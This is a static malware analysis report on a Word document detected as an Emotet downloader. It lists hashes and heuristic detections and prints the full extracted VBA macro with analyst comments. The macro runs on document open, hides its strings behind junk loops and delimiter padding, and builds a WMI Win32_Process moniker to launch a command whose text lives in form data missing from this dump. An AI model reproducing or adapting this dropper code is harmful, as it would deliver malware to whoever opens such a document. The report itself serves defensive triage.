Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d2991fc4edb1a667…

MALICIOUS

Office (OLE)

182.8 KB Created: 2019-12-20 19:40:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 021369dd438b340f58615f40985fa118 SHA-1: 16361b5545b27f0940621b6c23e61bb2667ee999 SHA-256: d2991fc4edb1a667fa2dcaf28987c4c24b844331d705f9fda99ed82680e886de
172 Risk Score

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-7473714-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7473714-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Zlbxvmqxbhtbm = GetObject(Oozvcrfscl)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7575 bytes
SHA-256: 08c944f3b4cd9e1d22d5483e817d198340b20aa35870bbb767208a62059a47fd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
176 of 317 identifiers look randomly generated (e.g. 'Mvvlfjqljgcry') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
' Module header of the ThisDocument module (VB_Base = "1Normal.ThisDocument").
' The VB_Control line declares an MSForms TextBox named Gytiudbjvyj on the
' document. The other modules read its text and splice it into the strings
' they build, so the control's contents (not part of this VBA dump) are
' needed to recover those strings in full.
Attribute VB_Name = "Vxxjpuroivnlu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gytiudbjvyj, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   ' Auto-execution entry point (runs when the document is opened); this is
   ' the OLE_VBA_DOCOPEN match. Everything here except the bare call to
   ' Ovmdxabvzp looks like filler: the Do While conditions test variables
   ' that are never assigned in the visible source (an unassigned Variant is
   ' Empty, not 1), so those loop bodies should never execute.
   Dsxkvdqwvbxbw = 234 + 423
   Do While Ietrcxlummv = 1
      Dyahtlnx = 3 * Zytfqziujrm
      Dggzsykx = ("Fred")
      For Qtwbqilh = Pusirvvesl To Nywbnluyosy
         Ltxrmyjv = ("Omnis.")
         Jnyhwdgeps = 223
      Next
      Yepuzmrvw = Egbxmgmasgmnn
Loop
' The only effective statement: calls the function Ovmdxabvzp defined below.
Ovmdxabvzp
   Jppvdpsfkq = 234 + 423
   Do While Atehjxzdj = 1
      Tfzrxydfo = 3 * Fsvxasiu
      Xbwmxqhboxa = ("Qui rerum aliquid.")
      For Vpexvhglw = Nmmmwgvpctwec To Hweapczlzhwun
         Cahzyldueicl = ("Ratione libero tenetur assumenda doloremque dicta est harum.")
         Ylbsvzkhwdu = 223
      Next
      Nfzlhciq = Dgoebzsmrvyaw
Loop
End Sub

' Module header of Xwtsaryn. The VB_Base value with two GUIDs is the form of
' a UserForm module; only the header survived extraction, no code. The other
' modules read members of this form (including ControlTipText and Tag
' properties of its controls), so parts of the strings they assemble live in
' form-control data rather than in VBA source. That data is not in this dump
' and has to be pulled from the form stream separately (olevba reports such
' values as form strings).
Attribute VB_Name = "Xwtsaryn"
Attribute VB_Base = "0{41A8A298-BA38-488F-9A2F-CA3C8BE5D474}{8E2F5AD2-4690-4C7A-BC26-6CDED876C27F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Module header of Uabiwvktv, the standard module holding the two functions
' below (the string builder Xpdnzdpoiosa and the GetObject caller Ovmdxabvzp).
Attribute VB_Name = "Uabiwvktv"
Function Xpdnzdpoiosa()
   ' Builds and returns a string from document/form control values; it is
   ' consumed as the first argument of the .Create call in Ovmdxabvzp.
   ' Only the unindented lines do any work. The indented Do While blocks are
   ' filler: their loop variables are never assigned in the visible source,
   ' so the bodies should never run. The string pieces come from the TextBox
   ' on the document module and from members of the form module Xwtsaryn
   ' whose contents are not in this dump, so the returned value cannot be
   ' recovered from the VBA source alone.
   Hxmiztra = 234 + 423
   Do While Hsewzhte = 1
      Ujgujlod = 3 * Lxbhlcarnja
      Dttcyxtqrfl = ("Asperiores ut aut aut.")
      For Qsyoeozyqjrwl = Cqkdlsdbp To Giztsqxnmis
         Mjrmjcfna = ("Nostrum earum fuga dolor.")
         Auhxfnqjfoh = 223
      Next
      Wrbyxkykrfrcb = Ndcgwltxiaiz
Loop
' Reads the text of the TextBox control declared on the ThisDocument module.
Kinetedfx = Vxxjpuroivnlu.Gytiudbjvyj
   Klgskatlinoel = 234 + 423
   Do While Fnaepnkcgy = 1
      Tjfvdofslxu = 3 * Onxtmhosz
      Yeokzjztak = ("Amet.")
      For Crlpfrah = Xaanjtrvxu To Wyzuscxaoxplu
         Ribziqnh = ("Voluptas.")
         Lagcfnfigv = 223
      Next
      Lyxjswzloth = Mvvlfjqljgcry
Loop
' Appends three members of the form Xwtsaryn ("+" acts as string
' concatenation here, assuming string operands); their values are in the
' form data, not in this source.
Ptjywpbprdtd = Kinetedfx + Xwtsaryn.Otgopzttwwsxm + Xwtsaryn.Xhaofdoue + Xwtsaryn.Huzdaljzgutn
   Mpxxwbgr = 234 + 423
   Do While Bsfoibqpfea = 1
      Rmsjvsddajjt = 3 * Fwadvkvdl
      Bsbxqict = ("Ut unde minima.")
      For Leskzdjai = Svktfafhyoax To Abgjahzuaush
         Hmcdzgjxrelhw = ("Corrupti deserunt sed et.")
         Rkglqybdqhovx = 223
      Next
      Axiizmmwxzk = Cysknwjjlv
Loop
' Appends another form member and the Tag property of a form control.
Hbjhcyhq = Ptjywpbprdtd + Xwtsaryn.Yumsgllsxk + Xwtsaryn.Ycqbeaauqeyp.Tag
   Gknrkjewgug = 234 + 423
   Do While Iolaztiezig = 1
      Ghfnkyvvlka = 3 * Tnlyspksnt
      Woykhbhev = ("Tempore.")
      For Qtjiqsxdkgqav = Qqcwtnog To Xkditonrpu
         Guzqqfzgn = ("Eaque sed quis et.")
         Glqczjkbmvyt = 223
      Next
      Urscjfxvhjhw = Jgiwtswxclohf
Loop
' Return value. Xhhtcaavbd is never assigned in the visible source; if it is
' Empty, the result is just Hbjhcyhq.
Xpdnzdpoiosa = Xhhtcaavbd + Hbjhcyhq + Xhhtcaavbd
   Kxgijdrldsqcz = 234 + 423
   Do While Putfchevy = 1
      Yiclpbmbhcg = 3 * Yknugkmdqltnm
      Sgcisvejjrdoq = ("Alfred")
      For Cicvhstkpndki = Ydsqjbzyzc To Ecdvwfqj
         Qbdyvnuokv = ("Occaecati ipsam beatae inventore.")
         Tawzoxcj = 223
      Next
      Nrphmshfsnxn = Mkfmdlrynejd
Loop
End Function
Function Ovmdxabvzp()
   ' Called from Document_open. De-obfuscates a moniker string with a
   ' Split/Join pair, binds to it with GetObject, and invokes .Create on the
   ' result. This is the GetObject + auto-exec pairing the p-code heuristic
   ' (OLE_VBA_PCODE_AUTOEXEC_EXEC) keys on. As in the other modules, the
   ' indented Do While blocks are filler whose loop variables are never
   ' assigned in the visible source, so their bodies should never run.
   Mcbdenpu = 234 + 423
   Do While Utxbcznbou = 1
      Czurhxruwbq = 3 * Jzpqcfetpxxlu
      Gemewvabi = ("Brendan")
      For Rdumsdeet = Kmoaxmcwfmkmo To Lxbjxgdwoay
         Uhqtehtaq = ("Recusandae dolorum non modi ullam quos ea iusto.")
         Nzmhthrgudrgc = 223
      Next
      Shqzayjx = Wrhhyovbdvytw
Loop
' Delimiter padding the real string below; every occurrence is removed by
' the Split/Join pair.
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Kmrzuwhpy = 234 + 423
   Do While Rnplsbun = 1
      Jghbmqsx = 3 * Ivlbzpvuxrbd
      Nemttltuxgafk = ("Quis et.")
      For Goryqtvco = Fappzgrl To Dydpyoyfa
         Xlrckfycr = ("Terrence")
         Hqfsfhguozkad = 223
      Next
      Irfxwnryhoy = Asiwefqnjfi
Loop
' Split on the delimiter. With the delimiter removed, the literal fragments
' read "winmgmts:Win32_", then the document TextBox text, then "rocess" --
' i.e. the WMI moniker prefix plus a Win32_ class name whose middle is
' supplied by the TextBox (not included in this dump).
Rpiaolvlcxto = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Vxxjpuroivnlu.Gytiudbjvyj + "__&888*&^bBGks^@ro__&888*&^bBGks^@ce__&888*&^bBGks^@ss__&888*&^bBGks^@", iwiwiiwiwjjsj)
   Xeftpulxgqj = 234 + 423
   Do While Txwhcgzltxi = 1
      Nqpjkhatdzt = 3 * Bkzkuwxija
      Hnncdgwgy = ("Lynn")
      For Iwfbpvpxcxre = Jdlqiepgdd To Qzswemuoro
         Imtdhiqjxqud = ("Doloremque sit eaque.")
         Qcfbschcepf = 223
      Next
      Fjavuoqivlmz = Loafplovsj
Loop
' Join with "" drops the delimiter, yielding the decoded moniker string.
Oozvcrfscl = Join(Rpiaolvlcxto, "")
   Kwyfoexiqau = 234 + 423
   Do While Lklpfrvae = 1
      Dpxcvrlhgig = 3 * Mtcmsrfua
      Uuuynwmgl = ("Harum nostrum.")
      For Zgvmzomu = Ogcmoihm To Dlqiaxmtkvalx
         Wrgsqhgfdgos = ("Deserunt eveniet dicta consectetur.")
         Nftgkyopmmbbt = 223
      Next
      Dcjrrrrb = Pxfncmeatxq
Loop
' GetObject on a "winmgmts:" moniker binds a WMI object. This is the line
' the OLE_VBA_GETOBJ heuristic matched; the decoded string, not the source
' text, is what matters for detection.
Set Zlbxvmqxbhtbm = GetObject(Oozvcrfscl)
   Tuzfolttwnla = 234 + 423
   Do While Frngtplllr = 1
      Tzhvpsrmux = 3 * Phzzrbxoluce
      Pfjhihqdsum = ("Byron")
      For Tieqheuqlpluk = Zywcxycl To Pgbmpfnpee
         Evacaeqyn = ("Fugit ipsum maxime distinctio soluta in incidunt.")
         Qdtxkdzrxbe = 223
      Next
      Tdwjxefpuruab = Yvdyrskjvhdme
Loop
' Second string: the decoded moniker plus the ControlTipText of two controls
' on the form Xwtsaryn (values live in form data, not in this source).
Wdjjiyfqaqw = Oozvcrfscl + Xwtsaryn.Zfekhwtx.ControlTipText + Xwtsaryn.Moatwzzciu.ControlTipText
   Cnvpbkuv = 234 + 423
   Do While Amyheezvdmy = 1
      Xxizdyqllj = 3 * Tmfamghbnffs
      Vgdficsdx = ("Dolorem neque odio rerum reiciendis aperiam enim placeat quia expedita.")
      For Kqxofocvplrt = Grhvrspmydk To Bazppnhcp
         Ircxxudmioc = ("Explicabo suscipit.")
         Ifzdystewh = 223
      Next
      Qvcgnoqhumaq = Dayarypohjo
Loop
' ...plus the document TextBox text again.
Bjvwjheqp = Wdjjiyfqaqw + Vxxjpuroivnlu.Gytiudbjvyj
   Tnrzrscapm = 234 + 423
   Do While Lsjmwsszuqe = 1
      Uyvsomzr = 3 * Oxugeekt
      Zguuhsbcdpdj = ("Accusamus sit eos veniam eveniet suscipit est soluta.")
      For Wthiazqympupc = Vkxdzcnealv To Ojafawjkwbsbe
         Fasqpohffgwv = ("Eos dolores voluptate omnis veritatis est sequi.")
         Gweotkcooof = 223
      Next
      Yiebvbtz = Fwigeuzebavq
Loop
' Second GetObject. The object is stored in the function's own return
' variable and reused below as an argument to .Create.
Set Ovmdxabvzp = GetObject(Bjvwjheqp)
   Xrayabska = 234 + 423
   Do While Swozrynkem = 1
      Zsplmmfdxcmjt = 3 * Tixfhetz
      Ivicppuxsag = ("Dolore.")
      For Fxufppkffnx = Ghrtgtyw To Xahnrladuit
         Mydjfjdik = ("Dolore cumque sint qui doloribus nobis mollitia accusamus ex.")
         Jngyunmsbgx = 223
      Next
      Csufjclio = Vcjtmaims
Loop
' Two properties set on the second object; what they control depends on the
' class the second moniker resolved to, which is not recoverable from this
' dump because the form-control pieces are missing.
Ovmdxabvzp.XSize = False
   Hrzqymfjrln = 234 + 423
   Do While Luytiwilrmqk = 1
      Vgdqkrnwpis = 3 * Opvwkpvbhnh
      Qdpejgzwjc = ("Ea.")
      For Crhoepbjitwv = Udontvmyb To Lzmzrfmha
         Nndxfuewhuodl = ("Sheila")
         Vjsieqyht = 223
      Next
      Krojnpywpak = Ruebmwwacij
Loop
Ovmdxabvzp.YSize = False
   Yddmihtlwbq = 234 + 423
   Do While Laxeesmyw = 1
      Onlnlrqhzy = 3 * Yqvwxwfjla
      Aefywgpb = ("Ut harum sit.")
      For Xuvgafkihkvp = Iwpcrwyojkm To Rlsjonftba
         Aycsuflfrqzrm = ("Et facere.")
         Ujlkttts = 223
      Next
      Bgctuhwxgrx = Pebbtblawdlkj
Loop
' The execution step: .Create on the WMI object bound above. First argument
' is KSNNSN (never assigned in the visible source, so "&" contributes "")
' concatenated with the string returned by Xpdnzdpoiosa; the third argument
' is the second object stored in this function's return variable; Ulyxaawbh
' and Zbhuutan are also unassigned here. The loop repeats while Create
' returns a nonzero value, i.e. it retries until the call reports zero.
' The actual command text is assembled from form-control data absent from
' this dump, so triage should pull the form strings rather than rely on
' this source alone.
Do While Zlbxvmqxbhtbm.Create(KSNNSN & Xpdnzdpoiosa, Ulyxaawbh, Ovmdxabvzp, Zbhuutan)
Loop
   Azddxdhpsivox = 234 + 423
   Do While Tcbzdjjamjcl = 1
      Cvhaujgges = 3 * Xejhysbyj
      Grqqyrtust = ("Porro placeat quisquam.")
      For Noodmonyjjv = Rfljkocwk To Ethpkxxnto
         Kpokwhbwvelg = ("Sit voluptatem omnis eos.")
         Kifbtcneyt = 223
      Next
      Nlmisrvmauvef = Enziadcnpi
Loop
End Function